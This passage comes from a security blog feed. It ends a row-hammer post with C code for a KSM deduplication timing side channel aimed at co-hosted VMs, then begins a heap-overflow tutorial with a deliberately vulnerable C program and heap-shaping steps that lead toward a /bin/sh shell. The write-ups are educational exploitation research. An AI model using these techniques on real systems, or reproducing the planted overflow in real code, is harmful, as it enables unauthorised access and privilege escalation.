<span class="n">buffer</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">madvise</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">MADV_MERGEABLE</span><span class="p">);</span>
<span class="n">srand</span><span class="p">(</span><span class="n">time</span><span class="p">(</span><span class="nb">NULL</span><span class="p">));</span>
<span class="kt">size_t</span> <span class="n">i</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">PAGE_NB</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="o">*</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="o">*</span><span class="p">)(</span><span class="n">buffer</span> <span class="o">+</span> <span class="p">(</span><span class="n">page_size</span> <span class="o">*</span> <span class="n">i</span><span class="p">))</span> <span class="o">=</span> <span class="n">rand</span><span class="p">();</span>
<span class="n">half</span> <span class="o">=</span> <span class="n">buffer</span> <span class="o">+</span> <span class="p">(</span><span class="n">page_size</span> <span class="o">*</span> <span class="p">(</span><span class="n">PAGE_NB</span> <span class="o">/</span> <span class="mi">2</span><span class="p">));</span>
<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="p">(</span><span class="n">PAGE_NB</span> <span class="o">/</span> <span class="mi">2</span><span class="p">);</span> <span class="n">i</span> <span class="o">+=</span> <span class="mi">2</span><span class="p">)</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">buffer</span> <span class="o">+</span> <span class="p">(</span><span class="n">page_size</span> <span class="o">*</span> <span class="n">i</span><span class="p">),</span> <span class="n">half</span> <span class="o">+</span> <span class="p">(</span><span class="n">page_size</span> <span class="o">*</span> <span class="n">i</span><span class="p">),</span> <span class="n">page_size</span><span class="p">);</span>
<span class="n">sleep</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">start</span><span class="p">,</span> <span class="n">end</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="p">(</span><span class="n">PAGE_NB</span> <span class="o">/</span> <span class="mi">2</span><span class="p">);</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="n">start</span> <span class="o">=</span> <span class="n">rdtsc</span><span class="p">();</span>
<span class="o">*</span><span class="p">(</span><span class="kt">uint8_t</span> <span class="o">*</span><span class="p">)(</span><span class="n">buffer</span> <span class="o">+</span> <span class="p">(</span><span class="n">page_size</span> <span class="o">*</span> <span class="n">i</span><span class="p">))</span> <span class="o">=</span> <span class="sc">'\xff'</span><span class="p">;</span>
<span class="n">end</span> <span class="o">=</span> <span class="n">rdtsc</span><span class="p">();</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[+] page modification took %"</span> <span class="n">PRIu64</span> <span class="s">" cycles</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">end</span> <span class="o">-</span> <span class="n">start</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>The program modifies a single byte in every element of the first half of the
buffer and measures the writing operation time.</p>
<p><img src="/images/hammer/side-chan.png" alt="" width="450px" class="center" />
<em>Figure 8 - Exploiting side-channel timing attack in KSM</em></p>
<p>According to the program output, we can clearly distinguish between duplicated
and unshared pages based on the number of CPU cycles required to perform
writing operations.</p>
<p><img src="/images/hammer/cain.png" alt="" />
<em>Figure 9 - Exploiting side-channel timing attack in KSM</em></p>
<p>Note that we can also rely on the side channel to detect the version of the
libpam running on the victim VM.</p>
<p>In our exploit, we assume that the attacker VM is started before the victim VM.
This condition ensures that KSM will always back merged pages by the physical
page controlled by the attacker. As noted in <a href="https://www.usenix.org/system/files/conference/usenixsecurity16/sec16_paper_razavi.pdf">Kaveh Razavi’s paper</a>,
this condition can be relaxed. The solution requires a deeper understanding on
KSM internals.</p>
<p><strong>Digression</strong>: KSM manages memory de-duplication by maintaining two red-black
trees: the stable tree and the unstable tree. The former keeps track of shared
pages whereas the latter stores the pages that are candidates for merging. KSM
scans periodically pages and tries to merge them from the stable tree first. If
it fails, it tries to find a match in the unstable tree. If it fails again, it
stores the candidate page in the unstable tree and proceeds with the next page.</p>
<p>In our case, the merge is performed from the unstable tree and KSM selects the
page that has registered first for merging. In other words, the VM that starts
first wins the merge. To relax that condition, we can try to merge pages from
the stable tree. All we have to do is to load twice the <code class="language-plaintext highlighter-rouge">pam_unix.so</code> module
in the attacker VM memory and wait until KSM merges those copies. Later, when
the <code class="language-plaintext highlighter-rouge">pam_unix.so</code> module is loaded in the victim VM (by attempting a faulty
authentication), its content will be merged with the copy already present in
the stable tree and controlled by the attacker.</p>
<h2 id="conclusions">Conclusions</h2>
<p>Row-Hammer attacks are no longer considered as a myth. They are powerful and
effective. In this blog post, we tried to provide the necessary tools to
weaponize row-hammer attacks. We provide an exploit that allows one to gain
access or elevate his privileges on a restricted co-hosted VM.</p>
<p>Note that disabling KSM is sufficient to stop our exploit:</p>
<figure class="highlight"><pre><code class="language-shell" data-lang="shell"><span class="nb">echo </span>0 <span class="o">></span> /sys/kernel/mm/ksm/run</code></pre></figure>
<p><strong>Disclaimer</strong>: Please note that this exploit is provided for testing and
educational purposes only. We do not condone or encourage the exploitation and
compromise of systems that you do not own personally.</p>
<h2 id="acknowledgements">Acknowledgements</h2>
<p>I would like to thank Paul Fariello for reviewing and improving the code.
Thanks to Pierre-Sylvain Desse for his insightful comments. Thanks also to the
<a href="https://twitter.com/vu5ec">VuSec’s researchers</a> for their impressive work on
row-hammering.</p>
<h2 id="references">References</h2>
<ul>
<li>
<p>Kaveh Razavi, Ben Gras, Erik Bosman, Bart Preneel, Cristiano Giuffrida and Herbert Bos. <a href="https://www.usenix.org/system/files/conference/usenixsecurity16/sec16_paper_razavi.pdf">Flip Feng Shui: Hammering a Needle in the Software Stack. In USENIX Security</a>. 2016.</p>
</li>
<li>
<p>Antonio Barresi, Kaveh Razavi, Mathias Payer and Thomas R. Gross. <a href="https://www.usenix.org/system/files/conference/woot15/woot15-paper-barresi.pdf">CAIN: Silently Breaking ASLR in the Cloud</a>. In USENIX Workshop on Offensive Technologies.</p>
</li>
<li>
<p>Mark Seaborn and Thomas Dullien. <a href="https://googleprojectzero.blogspot.fr/2015/03/exploiting-dram-rowhammer-bug-to-gain.html">Exploiting the DRAM rowhammer bug to gain kernel privileges</a>.</p>
</li>
</ul>Row-hammer is hardware bug that can cause bit-flips in physical RAM. Mark Seaborn and Thomas Dullien were the first to exploit the DRAM row-hammer bug to gain kernel privileges. Kaveh Razavi et al. pushed the exploitation of row-hammer bugs to the next level. They abused an OS feature - memory de-duplication - to surgically flip bits in a controlled way. They succeeded in flipping bits in memory loaded sensitive files (e.g. authorized_keys) assuming they know their contents. By weakening RSA moduli in authorized_keys file, they were able to generate corresponding private keys and authenticate on a co-hosted victim VM.The macabre dance of memory chunks2017-09-16T08:52:43+00:002017-09-16T08:52:43+00:00/heap-based/overflow,/exploits/2017/09/16/the-macabre-dance-of-memory-chunks<p>In this post, we want to share some notes on how to exploit heap-based overflow
vulnerabilities by corrupting the size of memory chunks. Please note that we do
not present here original content but only want to share with the community two
detailed write-up. The first one exploits a basic heap-based overflow by
enlarging the size of memory chunks. The second one shrinks their sizes in
order to turn a NULL byte off-by-one error – present in a hardened binary (all
memory corruption mitigations are enabled) – into remote code execution.</p>
<p>All sample code used in this blogpost is available for download
<a href="https://github.com/mtalbi/write-up/tree/master/heap">here</a></p>
<h2 id="memory-chunks">Memory chunks</h2>
<p>Before going further, we strongly encourage the reader to go through glibc
malloc internals. The post made by <a href="https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/">sploitfun</a> is probably the best
documentation on glibc allocator (ptmalloc2). Here we just recap the structure
of an allocated/free memory chunks:</p>
<p><img src="/images/chunks.png" alt="" />
<em>Figure 1 – Two allocated chunks (left) – Free chunk + allocated chunk (right)</em></p>
<h2 id="corrupting-chunk-sizes">Corrupting chunk sizes</h2>
<p>There is several techniques to exploit a heap-based overflow. In the following,
we will focus on the techniques presented in <a href="http://www.contextis.com/documents/120/Glibc_Adventures-The_Forgotten_Chunks.pdf">Goichon’s paper</a> that
consist in overflowing the chunk size field. Either enlarging or reducing the
size of memory chunks could lead to interesting scenarios where one can overlap
a memory chunk into another chunk. If the overlapped chunk contains memory
pointers, then an attacker can overwrite them to leak sensitive data and/or to
execute code.</p>
<p>The figure below illustrates the first scenario where the size of a chunk is
extended. If we manage to (i) allocate three contiguous chunks, namely A, B and
C, (ii) free the second one B and extend its size, (iii) allocate a larger
chunk than previously requested for B, then chunk C will be overlapped.</p>
<p><img src="/images/extending.png" alt="" />
<em>Figure 2 – Extending memory chunk size</em></p>
<p>Shrinking the size of chunks to produce overlapping chunks is more complex.
Figure 3 illustrates the different steps leading to overlapping chunks. First,
we allocate three large contiguous chunks A, B and C. Then, we free chunk B and
shrink its size by overwriting the chunk size field. In the third step, we
allocate two chunks B_1 and B_2 that feet on that freed chunk. As the size of
chunk B has been corrupted, the prev_size of chunk C will not be updated and
thus the freed B’s space is unused from C’s perspective. Now, if we free the
chunk B_1 and chunk C, then chunks B_1, B_2 and C will be merged. A subsequent
allocation larger than B_1 initial size will overlap chunk B_2. For further
infomration about this technique, please refer to <a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=96&redir=1">Tavis Ormandi’s
code</a>.</p>
<p><img src="/images/shrinking.png" alt="" />
<em>Figure 3 – Shrinking memory chunk size</em></p>
<h2 id="the-vulnerable-code">The vulnerable code</h2>
<p>Since the solutions of the challenges we did are meant not to published, we
decided to create a new one by reworking slightly the war game from the
excellent <a href="http://phrack.org/issues/67/8.html#article">blackngel’s Phrack paper</a>.</p>
<p>The code below manages a set of agents with basic operations (creation,
deletion, profile edition and modification).</p>
<p>When a new agent is created, two memory chunks are allocated. The first one
holds a pointer to the agent name along with the length of the agent name, the
agent id, and some reserved data. The second chunk holds the agent name pointed
to by field name of the first chunk. Those two chunks are freed when agents are
deleted.</p>
<p>The vulnerability stems from insufficient reserved space to hold the agent
name. More precisely, the allocated chunk at line 89 does not account for the
2-chars (“A_”) that prefix agent names. Therefore, we can overflow a chunk
with two bytes and hence corrupt the size of the next chunk.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include <stdio.h>
#include <stdlib.h>
#include <string.h>
</span>
<span class="cp">#define MAX_AGENT 256
</span>
<span class="kt">void</span> <span class="nf">main_menu</span><span class="p">(</span><span class="kt">void</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">agent_create</span><span class="p">(</span><span class="kt">void</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">agent_show</span><span class="p">(</span><span class="kt">void</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">agent_select</span><span class="p">(</span><span class="kt">void</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">agent_delete</span><span class="p">(</span><span class="kt">void</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">agent_edit</span><span class="p">(</span><span class="kt">void</span><span class="p">);</span>
<span class="kt">int</span> <span class="nf">agent_edit_name</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">buffer</span><span class="p">,</span> <span class="kt">int</span> <span class="n">size</span><span class="p">);</span>
<span class="k">typedef</span> <span class="k">struct</span> <span class="n">agent</span> <span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">size</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">reserved_0</span><span class="p">;</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">name</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">id</span><span class="p">;</span>
<span class="kt">char</span> <span class="n">reserved_1</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span>
<span class="p">}</span> <span class="n">agent_t</span><span class="p">;</span>
<span class="n">agent_t</span> <span class="o">*</span><span class="n">agents</span><span class="p">[</span><span class="n">MAX_AGENT</span><span class="p">];</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">agent_count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">agent_sel</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">global_id</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span>
<span class="p">{</span>
<span class="n">main_menu</span><span class="p">();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">main_menu</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">op</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">char</span> <span class="n">opt</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t\t\t\t</span><span class="s">[1] Create new agent"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t\t\t\t</span><span class="s">[2] Select agent"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t\t\t\t</span><span class="s">[3] Show agent"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t\t\t\t</span><span class="s">[4] Edit agent"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t\t\t\t</span><span class="s">[5] Delete agent"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t\t\t\t</span><span class="s">[0] <- EXIT"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t\t\t\t</span><span class="s">Select your option:"</span><span class="p">);</span>
<span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span>
<span class="n">fgets</span><span class="p">(</span><span class="n">opt</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span>
<span class="n">op</span> <span class="o">=</span> <span class="n">atoi</span><span class="p">(</span><span class="n">opt</span><span class="p">);</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">op</span><span class="p">)</span> <span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span>
<span class="n">agent_create</span><span class="p">();</span>
<span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="p">:</span>
<span class="n">agent_select</span><span class="p">();</span>
<span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">3</span><span class="p">:</span>
<span class="n">agent_show</span><span class="p">();</span>
<span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span>
<span class="n">agent_edit</span><span class="p">();</span>
<span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">5</span><span class="p">:</span>
<span class="n">agent_delete</span><span class="p">();</span>
<span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="nl">default:</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">main_menu</span><span class="p">();</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_create</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">4096</span><span class="p">];</span>
<span class="kt">int</span> <span class="n">len</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">agent_count</span> <span class="o"><</span> <span class="n">MAX_AGENT</span><span class="p">)</span> <span class="p">{</span>
<span class="n">agents</span><span class="p">[</span><span class="n">agent_count</span><span class="p">]</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="n">agent_t</span><span class="p">));</span>
<span class="n">len</span> <span class="o">=</span> <span class="n">agent_edit_name</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>
<span class="n">agents</span><span class="p">[</span><span class="n">agent_count</span><span class="p">]</span><span class="o">-></span><span class="n">name</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">len</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="n">strncpy</span><span class="p">(</span><span class="n">agents</span><span class="p">[</span><span class="n">agent_count</span><span class="p">]</span><span class="o">-></span><span class="n">name</span><span class="p">,</span> <span class="s">"A_"</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">agents</span><span class="p">[</span><span class="n">agent_count</span><span class="p">]</span><span class="o">-></span><span class="n">name</span> <span class="o">+</span> <span class="mi">2</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="n">agents</span><span class="p">[</span><span class="n">agent_count</span><span class="p">]</span><span class="o">-></span><span class="n">name</span><span class="p">[</span><span class="n">len</span> <span class="o">+</span> <span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
<span class="n">agents</span><span class="p">[</span><span class="n">agent_count</span><span class="p">]</span><span class="o">-></span><span class="n">size</span> <span class="o">=</span> <span class="n">len</span> <span class="o">+</span> <span class="mi">2</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">agents</span><span class="p">[</span><span class="n">agent_count</span><span class="p">]</span><span class="o">-></span><span class="n">reserved_0</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">memset</span><span class="p">(</span><span class="n">agents</span><span class="p">[</span><span class="n">agent_count</span><span class="p">]</span><span class="o">-></span><span class="n">reserved_1</span><span class="p">,</span> <span class="sc">'\0'</span><span class="p">,</span> <span class="mi">128</span><span class="p">);</span>
<span class="n">agents</span><span class="p">[</span><span class="n">agent_count</span><span class="p">]</span><span class="o">-></span><span class="n">id</span> <span class="o">=</span> <span class="n">global_id</span><span class="o">++</span><span class="p">;</span>
<span class="n">agent_sel</span> <span class="o">=</span> <span class="n">agent_count</span><span class="o">++</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[+] Agent %d selected."</span><span class="p">,</span> <span class="n">agents</span><span class="p">[</span><span class="n">agent_sel</span><span class="p">]</span><span class="o">-></span><span class="n">id</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_select</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">ag_id</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
<span class="kt">int</span> <span class="n">ag</span><span class="p">,</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Write agent number:"</span><span class="p">);</span>
<span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span>
<span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">ag_id</span><span class="p">,</span> <span class="mi">3</span><span class="p">);</span>
<span class="n">ag</span> <span class="o">=</span> <span class="n">atoi</span><span class="p">(</span><span class="n">ag_id</span><span class="p">);</span>
<span class="k">while</span> <span class="p">(</span><span class="n">i</span> <span class="o"><</span> <span class="n">agent_count</span> <span class="o">&&</span> <span class="n">agents</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">-></span><span class="n">id</span> <span class="o">!=</span> <span class="n">ag</span><span class="p">)</span> <span class="p">{</span>
<span class="n">i</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="n">agent_count</span><span class="p">)</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[!] No such agent [%d], select another"</span><span class="p">,</span> <span class="n">ag</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="n">agent_sel</span> <span class="o">=</span> <span class="n">i</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[+] Agent %d selected."</span><span class="p">,</span> <span class="n">agents</span><span class="p">[</span><span class="n">agent_sel</span><span class="p">]</span><span class="o">-></span><span class="n">id</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_edit</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">4096</span><span class="p">];</span>
<span class="kt">int</span> <span class="n">len</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">agent_count</span> <span class="o">></span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">len</span> <span class="o">=</span> <span class="n">agent_edit_name</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">></span> <span class="n">agents</span><span class="p">[</span><span class="n">agent_sel</span><span class="p">]</span><span class="o">-></span><span class="n">size</span><span class="p">)</span> <span class="p">{</span>
<span class="n">agents</span><span class="p">[</span><span class="n">agent_sel</span><span class="p">]</span><span class="o">-></span><span class="n">name</span> <span class="o">=</span> <span class="n">realloc</span><span class="p">(</span><span class="n">agents</span><span class="p">[</span><span class="n">agent_sel</span><span class="p">]</span><span class="o">-></span><span class="n">name</span><span class="p">,</span> <span class="n">len</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">agents</span><span class="p">[</span><span class="n">agent_sel</span><span class="p">]</span><span class="o">-></span><span class="n">name</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="n">agents</span><span class="p">[</span><span class="n">agent_sel</span><span class="p">]</span><span class="o">-></span><span class="n">name</span><span class="p">[</span><span class="n">len</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[!] No agents to edit"</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">agent_edit_name</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">buffer</span><span class="p">,</span> <span class="kt">int</span> <span class="n">size</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Edit agent name:"</span><span class="p">);</span>
<span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span>
<span class="n">len</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="n">size</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">></span> <span class="mi">0</span> <span class="o">&&</span> <span class="n">buffer</span><span class="p">[</span><span class="n">len</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'\n'</span><span class="p">)</span> <span class="n">len</span><span class="o">--</span><span class="p">;</span>
<span class="n">buffer</span><span class="p">[</span><span class="n">len</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
<span class="k">return</span> <span class="n">len</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_delete</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">agent_count</span> <span class="o">></span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">free</span><span class="p">(</span><span class="n">agents</span><span class="p">[</span><span class="n">agent_sel</span><span class="p">]</span><span class="o">-></span><span class="n">name</span><span class="p">);</span>
<span class="n">free</span><span class="p">(</span><span class="n">agents</span><span class="p">[</span><span class="n">agent_sel</span><span class="p">]);</span>
<span class="n">agent_count</span><span class="o">--</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">agent_count</span> <span class="o">!=</span> <span class="n">agent_sel</span><span class="p">)</span> <span class="p">{</span>
<span class="n">agents</span><span class="p">[</span><span class="n">agent_sel</span><span class="p">]</span> <span class="o">=</span> <span class="n">agents</span><span class="p">[</span><span class="n">agent_count</span><span class="p">];</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[+] Agent %d selected."</span><span class="p">,</span> <span class="n">agents</span><span class="p">[</span><span class="n">agent_sel</span><span class="p">]</span><span class="o">-></span><span class="n">id</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="n">agent_sel</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">agent_count</span> <span class="o">></span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[+] Agent %d selected."</span><span class="p">,</span> <span class="n">agents</span><span class="p">[</span><span class="n">agent_sel</span><span class="p">]</span><span class="o">-></span><span class="n">id</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[+] No more agents."</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[!] No agents to delete"</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_show</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">agent_count</span> <span class="o">></span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[+] Agent %d: "</span><span class="p">,</span> <span class="n">agents</span><span class="p">[</span><span class="n">agent_sel</span><span class="p">]</span><span class="o">-></span><span class="n">id</span><span class="p">);</span>
<span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span>
<span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">agents</span><span class="p">[</span><span class="n">agent_sel</span><span class="p">]</span><span class="o">-></span><span class="n">name</span><span class="p">,</span> <span class="n">agents</span><span class="p">[</span><span class="n">agent_sel</span><span class="p">]</span><span class="o">-></span><span class="n">size</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[!] No available agents"</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<h2 id="write-up--the-easy-way">Write-up – The easy way</h2>
<p>Notice that we cannot apply directly the scenario depicted in figure 2. Indeed,
if we create three agents and delete the second one, then we cannot enlarge the
size of the freed and merged chunks enough to reach interesting data of the
third agent. As stated earlier we can overwrite a chunk with only two bytes
(one byte + NULL byte). So, we need to shape the heap beforehand so that we can
get two adjacent chunks holding agent’s names.</p>
<p>Figure 4 sums up the steps to shape the heap:</p>
<ol>
<li>
<p>We create two agents Ag_0 and Ag_1.</p>
</li>
<li>
<p>We delete agent Ag_0.</p>
</li>
<li>
<p>We create a new agent Ag_2 by requesting a large size to store its name
than for Ag_0. The chunk holding the name of agent Ag_2 is allocated next to
the chunk holding the name og agent Ag_1.</p>
</li>
<li>
<p>We create a new agent Ag_3 that represents the target to overlap.</p>
</li>
<li>
<p>We create an additional agent Ag_4 that holds the strings “/bin/sh”. Our goal
is to execute a shell by calling system(“/bin/sh”).</p>
</li>
</ol>
<p><img src="/images/heap_shape_easy.png" alt="" />
<em>Figure 4 – Shaping the heap</em></p>
